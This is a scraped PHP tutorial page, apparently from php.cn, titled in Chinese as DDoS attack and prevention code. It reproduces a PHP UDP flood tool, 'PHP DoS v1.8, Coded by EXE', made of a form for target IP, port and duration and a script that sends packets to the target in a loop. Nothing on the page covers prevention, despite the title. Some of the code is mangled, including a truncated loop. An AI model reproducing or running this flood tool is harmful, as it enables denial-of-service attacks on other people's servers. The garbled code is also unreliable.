Heim  >  Artikel  >  Backend-Entwicklung  >  php下ddos攻击与防范代码

php下ddos攻击与防范代码

WBOY
WBOYOriginal
2016-07-25 09:05:142310Durchsuche
  1. $ip = $_SERVER['REMOTE_ADDR'];
  2. ?>
  3. PHP DoS, Coded by EXE


  4. php下ddos攻击与防范代码
  5. Your IP: (Don't DoS yourself nub)

  6. IP:
  7. Time:
  8. Port:




  9. After initiating the DoS attack, please wait while the browser loads.
复制代码

文件:function.php

  1. //=========================================
  2. //PHP DOS v1.8 (Possibly Stronger Flood Strength)
  3. //Coded by EXE
  4. //@link http://bbs.it-home.org
  5. //=========================================
  6. $packets = 0;
  7. $ip = $_POST['ip'];
  8. $rand = $_POST['port'];
  9. set_time_limit(0);
  10. ignore_user_abort(FALSE);
  11. $exec_time = $_POST['time'];
  12. $time = time();
  13. print "Flooded: $ip on port $rand

    ";
  14. $max_time = $time+$exec_time;
  15. for($i=0;$i$out .= "X";
  16. }
  17. while(1){
  18. $packets++;
  19. if(time() > $max_time){
  20. break;
  21. }
  22. $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
  23. if($fp){
  24. fwrite($fp, $out);
  25. fclose($fp);
  26. }
  27. }
  28. echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
  29. ?>
复制代码


Stellungnahme:
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn